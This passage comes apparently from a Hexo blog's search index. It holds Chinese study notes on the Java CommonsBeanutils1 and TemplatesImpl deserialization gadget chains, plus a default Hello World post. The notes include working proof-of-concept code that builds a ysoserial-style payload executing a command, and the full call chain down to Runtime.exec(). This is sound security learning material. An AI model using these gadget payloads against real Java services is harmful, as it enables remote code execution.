data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonsBeanutils%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210118143341316.png" alt="image-20210118143341316"></p><p>在 BeanComparator#compare() 中使用了 PropertyUtils.getProperty() 去处理传入的对象</p><p>PropertyUtils.getProperty() 是干嘛的?</p><p> 一般情况下,在<a href="http://lib.csdn.net/base/17">Java</a>中你可以通过get方法轻松获取beans中的属性值。但是,当你事先不知道 <em>beans</em> 的类型或者将要访问或修改的属性名时,该怎么办?Java语言中提供了一些像<code>java.beans.Introspector</code>这 样类,实现了在运行时检测Java类并确定属性get和set方法的名称,结合Java中的反射机制就可以调用这些方法了。然而,这些APIs使用起来比 较困难,并且将Java类中一些不必要的底层结构暴露给了开发人员。BeanUtils包中的APIs试图简化动态获取和设置bean属性的过程。</p><p>而 getProperty() 的定义如下:</p><p><code>PropertyUtils.getProperty(Object bean, String name)</code><br><code>bean</code> 是不为null的Java Bean实例<br><code>name</code> 是Java Bean属性名称 (也就是方法中的getXxx(), setXxx(), 其中的xxx成为这个java bean的bean属性, java中的类成员变量称为字段, 并不是属性。<br>这个方法是调用bean对象中, 中的getname()方法</p><p>简单来说就是PropertyUtils.getProperty() 有两个参数 Object、String,比如传入 User() 和 “xxx”,PropertyUtils.getProperty(new User(),”xxx”) 就相当于调用了 User.getxxx() 方法。</p><p>在 BeanComparator#compare() 中 o1、o2 就是队列中的元素,this.property 也是可控的。这就相当于我们能够调用任意类中的 getter 方法即以 get 开头且没有参数的方法。</p><p><strong><em>到这我们总结一下</em></strong>,通过定义一个 PriorityQueue 队列,并且设置比较器为我们构造好的 BeanComparator 比较器,就可以执行队列中元素的任意 getter 方法。</p><p>所以我们只需要找到一个包含能触发危险敏感操作的 getter 方法的可序列化类即可,ysoserial 中 CommonsBeanutils1 使用的是 <strong>TemplatesImpl</strong> 类(com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl)</p><p>TemplatesImpl 类可以加载自定义的字节码并实例化,从而可执行任意 Java 代码.并且它的入口函数为 TemplatesImpl#getOutputProperties() ,具体可以看 <a href="https://blog.weik1.top/2021/01/15/TemplatesImpl%E5%88%A9%E7%94%A8%E9%93%BE/#%E5%88%A9%E7%94%A8-TemplatesImpl-%E5%8A%A0%E8%BD%BD%E5%AD%97%E8%8A%82%E7%A0%81">https://blog.weik1.top/2021/01/15/TemplatesImpl%E5%88%A9%E7%94%A8%E9%93%BE/#%E5%88%A9%E7%94%A8-TemplatesImpl-%E5%8A%A0%E8%BD%BD%E5%AD%97%E8%8A%82%E7%A0%81</a></p><p>写代码复现一下这个过程</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> payload;</span><br><span class="line"><span class="keyword">import</span> java.math.BigInteger;</span><br><span class="line"><span class="keyword">import</span> java.util.PriorityQueue;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.beanutils.BeanComparator;</span><br><span class="line"><span class="keyword">import</span> ysoserial.payloads.util.Gadgets;</span><br><span class="line"><span class="keyword">import</span> ysoserial.payloads.util.Reflections;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">CommonsBeanutils1</span> </span>{</span><br><span class="line"> <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>{</span><br><span class="line"> <span class="comment">// 直接用ysoserial 的 Gadgets.createTemplatesImpl创建一个恶意 templates 类</span></span><br><span class="line"> String args1 = <span class="string">"/System/Applications/Calculator.app/Contents/MacOS/Calculator"</span>;</span><br><span class="line"> <span class="keyword">final</span> Object templates = Gadgets.createTemplatesImpl(args1);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 实例化一个 BeanComparator 比较器</span></span><br><span class="line"> <span class="keyword">final</span> BeanComparator comparator = <span class="keyword">new</span> BeanComparator(<span class="string">"lowestSetBit"</span>);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 设置BeanComparator 比较器的 property 属性为 outputProperties,因为最后需要执行 TemplatesImpl 的 getOutputProperties()方法</span></span><br><span class="line"> Reflections.setFieldValue(comparator, <span class="string">"property"</span>, <span class="string">"outputProperties"</span>);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 实例化 PriorityQueue 队列,并且设置比较器为前边定义的 BeanComparator comparator</span></span><br><span class="line"> <span class="keyword">final</span> PriorityQueue<Object> queue = <span class="keyword">new</span> PriorityQueue<Object>(<span class="number">2</span>, comparator);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 将定义的恶意 TemplatesImpl 类对象添加到队列, 需要触发比较所以添加两个</span></span><br><span class="line"> queue.add(templates);</span><br><span class="line"> queue.add(templates);</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>成功执行命令</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/CommonsBeanutils%E9%93%BE%E5%88%86%E6%9E%90.assets/image-20210118152705398.png" alt="image-20210118152705398"></p><p>前边说的 PriorityQueue 反序列化的时候会对队列中的元素使用比较器的 compare 方法,所以效果也是一样的,反序列化时的调用链:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">PriorityQueue.readObject()</span><br><span class="line">PriorityQueue.heapify()</span><br><span class="line">PriorityQueue.siftDown()</span><br><span class="line">siftDownUsingComparator()</span><br><span class="line">BeanComparator.compare()</span><br><span class="line">TemplatesImpl.getOutputProperties()</span><br><span class="line">TemplatesImpl.newTransformer()</span><br><span class="line">TemplatesImpl.getTransletInstance()</span><br><span class="line">TemplatesImpl.defineTransletClasses()</span><br><span class="line">TemplatesImpl.TransletClassLoader.defineClass()</span><br><span class="line">Pwner*(Javassist-generated).<static init></span><br><span class="line">Runtime.exec()</span><br></pre></td></tr></table></figure>]]></content>
<categories>
<category> JAVA安全 </category>
</categories>
<tags>
<tag> JAVA安全 </tag>
<tag> 反序列化 </tag>
<tag> CommonsBeanutilså </tag>
</tags>
</entry>
<entry>
<title>Hello World</title>
<link href="2021/01/17/hello-world/"/>
<url>2021/01/17/hello-world/</url>
<content type="html"><![CDATA[<p>Welcome to <a href="https://hexo.io/">Hexo</a>! This is your very first post. Check <a href="https://hexo.io/docs/">documentation</a> for more info. If you get any problems when using Hexo, you can find the answer in <a href="https://hexo.io/docs/troubleshooting.html">troubleshooting</a> or you can ask me on <a href="https://github.com/hexojs/hexo/issues">GitHub</a>.</p><h2 id="Quick-Start"><a href="#Quick-Start" class="headerlink" title="Quick Start"></a>Quick Start</h2><h3 id="Create-a-new-post"><a href="#Create-a-new-post" class="headerlink" title="Create a new post"></a>Create a new post</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo new <span class="string">"My New Post"</span></span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/writing.html">Writing</a></p><h3 id="Run-server"><a href="#Run-server" class="headerlink" title="Run server"></a>Run server</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo server</span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/server.html">Server</a></p><h3 id="Generate-static-files"><a href="#Generate-static-files" class="headerlink" title="Generate static files"></a>Generate static files</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo generate</span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/generating.html">Generating</a></p><h3 id="Deploy-to-remote-sites"><a href="#Deploy-to-remote-sites" class="headerlink" title="Deploy to remote sites"></a>Deploy to remote sites</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo deploy</span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/one-command-deployment.html">Deployment</a></p>]]></content>
<categories>
<category> HelloWorld </category>
</categories>
<tags>
<tag> 博客 </tag>
<tag> hexo </tag>
</tags>
</entry>
<entry>
<title>TemplatesImpl利用链学习</title>
<link href="2021/01/15/TemplatesImpl%E5%88%A9%E7%94%A8%E9%93%BE/"/>
<url>2021/01/15/TemplatesImpl%E5%88%A9%E7%94%A8%E9%93%BE/</url>
<content type="html"><![CDATA[<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>学习 Java 反序列化利用链的过程中经常出现到 TemplatesImpl 的身影,这里简单分析一下它的作用以及调用链。</p><h2 id="ClassLoader-加载字节码"><a href="#ClassLoader-加载字节码" class="headerlink" title="ClassLoader 加载字节码"></a>ClassLoader 加载字节码</h2><p>我们都知道 Java 的 ClassLoader 是用来加载字节码文件最基础的方法,ClassLoader 是什么呢?它就是一个“加载器”,告诉Java虚拟机如何加载这个类,用一句话概括它的作用就是将传入的字节码处理成真正的 Java 类然后返回。</p><p>ClassLoader 处理字节码的流程为 loadClass -> findClass -> defineClass</p><p> loadClass: 从已加载的类缓存、父加载器等位置寻找类(这里实际上是双亲委派机制),在前面没有找到的情况下,执行 findClass </p><p> findClass: 根据基础URL指定的方式来加载类的字节码</p><p> defineClass:处理前面传入的字节码,将其处理成真正的Java类</p><p>所以将字节码转为 java 类的其实是 defineClass 方法, 翻看源码 ClassLoader#defineClass 是一个protected属性,无法直接在外部访问,只能通过反射的形式来调用。所以在实际场景中很难利用到它。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/TemplatesImpl%E5%88%A9%E7%94%A8%E9%93%BE.assets/image-20210115173544326.png" alt="image-20210115173544326"></p><h2 id="利用-TemplatesImpl-加载字节码"><a href="#利用-TemplatesImpl-加载字节码" class="headerlink" title="利用 TemplatesImpl 加载字节码"></a>利用 TemplatesImpl 加载字节码</h2><p>前边说到 ClassLoader 的 defineClass 方法只能通过反射调用,在实际环境中很难有利用场景。但是在 TemplatesImpl 类中有一个内部类 TransletClassLoader 它重写了 defineClass,并且这里没有显式地声明其定义域。Java中默认情况下,如果一个方法没有显式声明作用域,其作用域为default。所以也就是说这里的 defineClass 由其父类的 protected 类型变成了一个 default 类型的方法,可以被类外部调用。</p><p><em>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</em></p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/TemplatesImpl%E5%88%A9%E7%94%A8%E9%93%BE.assets/image-20210115181643940.png" alt="image-20210115181643940"></p><p>但是 TransletClassLoader 是内部类,只允许 TemplatesImpl 类中的方法调用,我们跟一下有哪些方法用到了 TransletClassLoader。</p><p>TemplatesImpl 类中只有一个方法 TemplatesImpl#defineTransletClasses 用到了 TransletClassLoader 类,但是 TemplatesImpl#defineTransletClasses 是 <em>private</em> 类型。继续跟看哪调用了 TemplatesImpl#defineTransletClasses 方法。</p><p><em>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</em></p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/TemplatesImpl%E5%88%A9%E7%94%A8%E9%93%BE.assets/image-20210115182341953.png" alt="image-20210115182341953"></p><p>有三个方法调用了 TemplatesImpl#defineTransletClasses(), 其中 TemplatesImpl#getTransletIndex() 是 public 类型的,TemplatesImpl#getTransletClasses() 和 TemplatesImpl#getTransletInstance() 是 private 属性的。</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">private synchronized Class[] getTransletClasses()</span><br><span class="line">public synchronized int getTransletIndex()</span><br><span class="line">private Translet getTransletInstance()</span><br></pre></td></tr></table></figure><p>尝试用 TemplatesImpl#getTransletIndex() 当作入口去调用 defineClass</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">TemplatesImpl#getTransletIndex() -> TemplatesImpl#defineTransletClasses() -> TemplatesImpl#defineTransletClasses() -> defineClass</span><br></pre></td></tr></table></figure><p> 这里用p牛文章中的dome,发现没用成功。</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/TemplatesImpl%E5%88%A9%E7%94%A8%E9%93%BE.assets/image-20210116132923834.png" alt="image-20210116132923834"></p><p>这里原因暂时没搞清楚,继续跟 TemplatesImpl#getTransletClasses() 和 TemplatesImpl#getTransletInstance()</p><p>TemplatesImpl 类中已经没有调用 getTransletClasses() 的方法了,而 getTransletInstance() 方法在 public synchronized Transformer newTransformer 方法中被调用了</p><p>所以到这又有一条调用链 </p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">TemplatesImpl#newTransformer() -> TemplatesImpl#getTransletInstance() -> TemplatesImpl#defineTransletClasses()->TemplatesImpl#defineTransletClasses() -> TransletClassLoader#defineClass() </span><br></pre></td></tr></table></figure><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/TemplatesImpl%E5%88%A9%E7%94%A8%E9%93%BE.assets/image-20210116133937292.png" alt="image-20210116133937292"></p><p>成功触发了HelloTemplatesImpl的构造函数,p牛文章中的调用链就是这个。</p><p>再继续跟进 TemplatesImpl#newTransformer() 发现 TemplatesImpl#getOutputProperties() 调用了 TemplatesImpl#newTransformer() 并且它也是 public 类型的</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/TemplatesImpl%E5%88%A9%E7%94%A8%E9%93%BE.assets/image-20210116140435918.png" alt="image-20210116140435918"></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">TemplatesImpl#getOutputProperties() ->TemplatesImpl#newTransformer() -> TemplatesImpl#getTransletInstance() -> TemplatesImpl#defineTransletClasses()->TemplatesImpl#defineTransletClasses() -> TransletClassLoader#defineClass() </span><br></pre></td></tr></table></figure><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/TemplatesImpl%E5%88%A9%E7%94%A8%E9%93%BE.assets/image-20210116140536968.png" alt="image-20210116140536968"></p><p>也成功触发了。</p><p>总结一下三条调用链</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">//未成功触发</span><br><span class="line">TemplatesImpl#getTransletIndex() -> TemplatesImpl#defineTransletClasses()->TemplatesImpl#defineTransletClasses() -> TransletClassLoader#defineClass()</span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">TemplatesImpl#newTransformer() -> TemplatesImpl#getTransletInstance() -> TemplatesImpl#defineTransletClasses()->TemplatesImpl#defineTransletClasses() -> TransletClassLoader#defineClass() </span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">TemplatesImpl#getOutputProperties() ->TemplatesImpl#newTransformer() -> TemplatesImpl#getTransletInstance() -> TemplatesImpl#defineTransletClasses()->TemplatesImpl#defineTransletClasses() -> TransletClassLoader#defineClass() </span><br></pre></td></tr></table></figure><p>为什么 getTransletIndex -> defineTransletClasses->defineTransletClasses -> defineClass 这条链不行呢,分别 debug 调试一下三条调用链发现最终到达 defineClass 的时候变量b 的值是一样的。请教了一下 P牛 ,发现这和defineClass() 的特性有关。在<code>defineClass</code>被调用的时候,类对象是不会被初始化的,只有这个对象显式地调用其构造函数,初始化代码才能被执行。而且,即使我们将初始化代码放在类的static块中,在<code>defineClass</code>时也无法被直接调用到。所以,如果我们要使用<code>defineClass</code>在目标机器上执行任意代码,需要想办法调用构造函数。回过来看调用的getTransletIndex ()方法,虽然有执行到defineClass,但后面没有对这个类对象进行实例化,也就是没有调用构造函数,所以其实是没有触发漏洞的。而TemplatesImpl#newTransformer(),在调用完TemplatesImpl#defineTransletClasses()后又调用了newInstance()构造函数(如图),所以触发了恶意代码,</p><p><img src="" data-original="https://weik1.oss-cn-beijing.aliyuncs.com/Blog_images/TemplatesImpl%E5%88%A9%E7%94%A8%E9%93%BE.assets/ZSXQ_20210117_180148237.png" alt="ZSXQ_20210117_180148237"></p><p>ysoserial 中的 Gadgets.createTemplatesImpl 函数, 其实就是生成一个 TemplatesImpl 去加载字节码从而实现执行命令</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">public static <T> T createTemplatesImpl ( final String command, Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory )</span><br><span class="line"> throws Exception {</span><br><span class="line"> //实例化TemplatesImpl</span><br><span class="line"> final T templates = tplClass.newInstance();</span><br><span class="line"></span><br><span class="line"> // use template gadget class</span><br><span class="line"> //************************创建Payload类生成字节码开始*******************************</span><br><span class="line"> ClassPool pool = ClassPool.getDefault();</span><br><span class="line"> pool.insertClassPath(new ClassClassPath(StubTransletPayload.class));</span><br><span class="line"> pool.insertClassPath(new ClassClassPath(abstTranslet));</span><br><span class="line"> final CtClass clazz = pool.get(StubTransletPayload.class.getName());</span><br><span class="line"> // run command in static initializer</span><br><span class="line"> // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections</span><br><span class="line"> String cmd = "java.lang.Runtime.getRuntime().exec(\"" +</span><br><span class="line"> command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +</span><br><span class="line"> "\");";</span><br><span class="line"> clazz.makeClassInitializer().insertAfter(cmd);</span><br><span class="line"> // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)</span><br><span class="line"> clazz.setName("ysoserial.Pwner" + System.nanoTime());</span><br><span class="line"> CtClass superC = pool.get(abstTranslet.getName());</span><br><span class="line"> clazz.setSuperclass(superC);</span><br><span class="line"></span><br><span class="line"> final byte[] classBytes = clazz.toBytecode();</span><br><span class="line">//************************创建Payload类生成字节码结束*******************************</span><br><span class="line"></span><br><span class="line"> // inject class bytes into instance,插入Class字节码到TemplatesImpl实例</span><br><span class="line"> Reflections.setFieldValue(templates, "_bytecodes", new byte[][] {</span><br><span class="line"> classBytes, ClassFiles.classAsBytes(Foo.class)</span><br><span class="line"> });</span><br><span class="line"> </span><br><span class="line"> // required to make TemplatesImpl happy,喵喵喵?</span><br><span class="line"> Reflections.setFieldValue(templates, "_name", "Pwnr");</span><br><span class="line"> Reflections.setFieldValue(templates, "_tfactory", transFactory.newInstance());</span><br><span class="line"> return templates;</span><br><span class="line"> }</span><br></pre></td></tr></table></figure><h2 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h2><p><a href="https://blog.csdn.net/fnmsd/article/details/88543233">https://blog.csdn.net/fnmsd/article/details/88543233</a></p><p>p牛 《Java安全漫谈 - 13.Java中动态加载字节码的那些方法》</p>]]></content>
<categories>
<category> JAVA安全 </category>
</categories>
<tags>
<tag> JAVA安全 </tag>
<tag> 反序列化 </tag>
<tag> TemplatesImpl </tag>
</tags>
</entry>
</search>